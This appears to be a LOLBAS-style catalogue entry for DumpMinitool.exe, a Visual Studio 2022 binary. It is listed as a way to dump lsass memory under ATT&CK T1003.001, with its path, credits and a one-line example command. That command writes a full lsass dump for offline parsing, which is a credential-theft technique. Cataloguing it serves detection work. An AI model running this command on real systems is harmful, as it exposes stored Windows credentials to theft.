.. /DumpMinitool.exe
Star

Dump tool part Visual Studio 2022

Paths:

C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

Resources:

https://twitter.com/mrd0x/status/1511415432888131586

Acknowledgements:

mr.d0x (@mrd0x)

Detection:

Dump

Creates a memory dump of the lsass process
```
DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
```
Use case
Create memory dump and parse it offline

Privileges required
Administrator

Operating systems
Windows 10, Windows 11

ATT&CK® technique
T1003.001